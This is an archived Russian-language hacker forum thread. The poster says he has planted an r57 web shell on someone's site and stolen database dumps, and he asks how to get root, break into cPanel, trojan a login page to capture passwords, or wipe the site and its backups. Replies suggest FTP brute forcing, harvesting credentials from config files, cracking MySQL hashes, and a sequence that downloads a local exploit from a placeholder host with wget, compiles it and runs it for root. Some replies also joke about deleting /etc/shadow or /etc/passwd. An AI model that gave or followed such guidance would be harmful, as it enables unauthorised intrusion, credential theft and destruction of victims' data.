Просмотр полной версии : Залит шелл, как дальше?
Всем привет.
Дано: залит классический r57, стянуты дампы баз данных, частично расшифрованы.
Пароли админов похоже слишком сложные, неделя расшифровки результатов не дала.
Посоветуйте, что можно сделать дальше... хотел протроянить login.php форума или сайта, что бы он пароли высылал нешифрованые но шелу не хватает прав.
В общем вопрос такой, как повысить шелл в правах
либо как при этих условиях взломать cpanel (только не брутфорс, скорее всего не поможет)
либо как тупо удалить всё из public_html и каталога выше (полюбому там бэкапы баз есть)
Скриптик то у меня для удаления конечно есть, но как ему дать достаточно прав для меня тоже вопрос.
И ещё, может быть есть способы открыть фтп?
Termin@L
13.09.2007, 16:38
Во-первых, в r57 есть функция фтп брута, во-вторых, повысить права скрипта можно двумя способами - либо покопаться в конфигах серва и найти пароли, либо сплойтом, как использовать эксплойт и байнд скрипты, а также бэкконнеты смотри на форуме
Y.Dmitriy
13.09.2007, 16:58
командную строку вызвать могёшь?
uname -a
http://my_lybimii_bug_track.com/sploit/
wget http://my_lybimii_bug_track.com/sploit/1.c
gcc 1.c -o haked
./haked
id
(0)root!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
А я бы сразу удалил /etc/shadow!!!
прав не хватит. и заливка тогда коту под хвост...
так что лучше удаляй /etc/passwd
Да знаю!!Да бы не разводить флейм, надо root или права на Public_html!Кста, а /etc/passwd можно удалить без прав рута, ну ты дал!
повысить права скрипта можно двумя способами - либо покопаться в конфигах серва и найти пароли, либо сплойтом, как использовать эксплойт и байнд скрипты, а также бэкконнеты смотри на форуме
первое не походит по тому что конфиги то недоступны, этот сайт один из многих у хочтера. Хостер довольно крупный и мне уж точно сейчас не по зубам.
По части второго, спасибо пищу, почитаю...
командную строку вызвать могёшь? cmd? :) Нет, на сервере не могу.
uname -a
http://my_lybimii_bug_track.com/sploit/
wget http://my_lybimii_bug_track.com/sploit/1.c
gcc 1.c -o haked
./haked
id
(0)root!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1.c - какой споилт, будет ли он там компилироваться?
gcc 1.c -o haked
./haked
id
^^^что это означает? Извините по никсу слаб, просто появилась задача, стараюсь её реализовать.
рекурсивное удаление (т.е. удаление, включая подкаталоги и скрытые файлы).
Так можна удалить файлы даже если их владелец являеться root, или если даже нету прав на их чтение. Только будь осторожен, я бы не советовал прямо удалять все файлы из папки public_html.
Не хватит прав
почитай конфиги сайта, если это не хомяк, то скорее всего есть скрипты для работы с бд ищи в них название конфигурационного файла (config.php,config.inc,config.inc.php,dbconf.php и т.д.) читай этот файл от бд там пароль и логин в чистом виде... пробуй их на другие сервисы на фтп или ssh могут прокатить...
если у тебя будет доступ к базе mysql (хотя врядли если это крутой хостер) то узнавай хеши паролей юзеров бд и бруть их, а потом также пробуй их к ssh и фтп...
я говорил же.. хэши (и дампы баз) стянул. Пароли админов не расшифровываются.
пароли от конфигов тоже никуда кроме как к базам не подходят.
я говорил же.. хэши (и дампы баз) стянул. Пароли админов не расшифровываются.
пароли от конфигов тоже никуда кроме как к базам не подходят.
мдя... причем тут админы я тебе про базу mysql говорил табличка там есть такая user так вот там хеши зашифрованные алгоритмами mysql или mysql5 (cоответственно 16 и 40 знаков) а если ниче не помогает, то тока рутать (ну или фтп брутить с помощью brutus aet например) тыб сначала написал какая там ось ядро и т.д.
в шелле выполни комманду uname -a и результаты в студию
Я же тебе говорю узнал что там за ось стоит, от этого и отъедь!!!!
А какая твоя конечная цель, непойму. Шелл залить, дамп есть.
Узнай если ядро не бажное, если да, то сплоит в руки и бери рут!
А какая твоя конечная цель, непойму. Шелл залить, дамп есть. цель это получение пароля от cpanel.
Дампы слиты но пароли админов не подбираются (вероятно просто длинные), так вот в виду невозможности расшифровки необходим полный дестрой =)
Просто удалить всё, вместе с бэкапами. Шелу прав на это не хватает.
uname -a
Linux targetsrv.ru 2.6.9-42.ELsmp #1 SMP Wed Jul 12 23:27:17 EDT 2006 i686 i686 i386 GNU/Linux
прошу ЧИТАЙТЕ ВНИМАТЕЛЬНО!!!
Я в самом начале говорил что шелл, залил. mysql базы посливал. Пароль которые получилось расшифровать расшифровал.
Теперь задача, взять пароль от cpanel либо полный дестрой, папки этого пользователя на хостинге включая бэкапы файлов и public_html
И ещё отдельный привет Dronga, держи своё мнение при себе! Ситуации бывают разные. А жизнь вообще тяжела и несправедлива! ;)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot